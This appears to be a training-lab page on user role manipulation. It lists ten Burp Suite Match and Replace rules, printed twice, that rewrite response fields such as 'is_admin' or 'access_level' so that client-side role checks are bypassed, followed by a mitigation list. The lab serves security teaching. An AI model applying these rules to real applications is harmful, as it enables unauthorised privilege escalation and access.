Lab 9: User Role Manipulation - Response Manipulation Labs

Difficulty: High

Lab Overview

This lab demonstrates user role manipulation vulnerabilities where attackers can use Burp Suite to modify role responses and bypass role restrictions.

Objective: Understand how user role manipulation attacks work and how to exploit them using Burp Suite.

User Role System

Check Role

Test user role with response manipulation:

Check Permissions

Check user permissions:

Check Access

Check user access to resources:

User Role Manipulation Tester

⚠️ User Role Manipulation Warning

This lab demonstrates user role manipulation vulnerabilities:

Role Bypass - Bypass role restrictions
Permission Bypass - Bypass permission checks
Access Bypass - Bypass access controls
Privilege Escalation - Escalate user privileges

Burp Suite Rules

Use these Burp Suite Match and Replace rules:

"has_role":false → "has_role":true
"is_admin":false → "is_admin":true
"has_permission":false → "has_permission":true
"has_access":false → "has_access":true

User Role Manipulation Rules

Role Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_role\":false", "string_replace": "\"has_role\":true" }

Admin Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"is_admin\":false", "string_replace": "\"is_admin\":true" }

Permission Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_permission\":false", "string_replace": "\"has_permission\":true" }

Access Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_access\":false", "string_replace": "\"has_access\":true" }

Role Status Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role_status\":\"unauthorized\"", "string_replace": "\"role_status\":\"authorized\"" }

Permission Status Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_status\":\"denied\"", "string_replace": "\"permission_status\":\"granted\"" }

Vulnerability Details

Type: User Role Manipulation
Severity: Critical
Method: Burp Suite Match and Replace
Issue: Client-side trust of role responses

Attack Vectors

Role Bypass: Bypass role restrictions
Permission Bypass: Bypass permission checks
Access Bypass: Bypass access controls
Privilege Escalation: Escalate user privileges

User Role Manipulation Examples

Use these Burp Suite Match and Replace rules to exploit user role manipulation vulnerabilities:

1. Role Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"has_role\":false",
  "string_replace": "\"has_role\":true"
}

// This rule bypasses role restrictions
// Example: "has_role":false becomes "has_role":true

2. Admin Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"is_admin\":false",
  "string_replace": "\"is_admin\":true"
}

// This rule bypasses admin restrictions
// Example: "is_admin":false becomes "is_admin":true

3. Permission Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"has_permission\":false",
  "string_replace": "\"has_permission\":true"
}

// This rule bypasses permission checks
// Example: "has_permission":false becomes "has_permission":true

4. Access Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"has_access\":false",
  "string_replace": "\"has_access\":true"
}

// This rule bypasses access controls
// Example: "has_access":false becomes "has_access":true

5. Role Status Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"role_status\":\"unauthorized\"",
  "string_replace": "\"role_status\":\"authorized\""
}

// This rule bypasses role status
// Example: "role_status":"unauthorized" becomes "role_status":"authorized"

6. Permission Status Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"permission_status\":\"denied\"",
  "string_replace": "\"permission_status\":\"granted\""
}

// This rule bypasses permission status
// Example: "permission_status":"denied" becomes "permission_status":"granted"

7. Access Level Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"access_level\":\"user\"",
  "string_replace": "\"access_level\":\"admin\""
}

// This rule bypasses access level
// Example: "access_level":"user" becomes "access_level":"admin"

8. User Type Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"user_type\":\"regular\"",
  "string_replace": "\"user_type\":\"admin\""
}

// This rule bypasses user type
// Example: "user_type":"regular" becomes "user_type":"admin"

9. Privilege Level Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"privilege_level\":\"low\"",
  "string_replace": "\"privilege_level\":\"high\""
}

// This rule bypasses privilege level
// Example: "privilege_level":"low" becomes "privilege_level":"high"

10. Role Assignment Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"role_assigned\":false",
  "string_replace": "\"role_assigned\":true"
}

// This rule bypasses role assignment
// Example: "role_assigned":false becomes "role_assigned":true

Real-World Attack Scenarios

Complete role bypass and unauthorized access
Privilege escalation and admin access
Data manipulation and integrity issues
Compliance violations and legal issues
Business process disruption and operational impact
Resource abuse and unauthorized operations

Mitigation Strategies

Implement server-side role validation
Use response integrity checks and signatures
Implement proper role controls
Use secure coding practices
Regular security testing and vulnerability assessments
Monitor for unusual role patterns
Implement proper input validation
Use multi-factor authentication
Implement proper error handling
Educate users about security threats
Use role bypass detection tools
Implement proper audit trails
Use role-based access control (RBAC)
Implement proper privilege management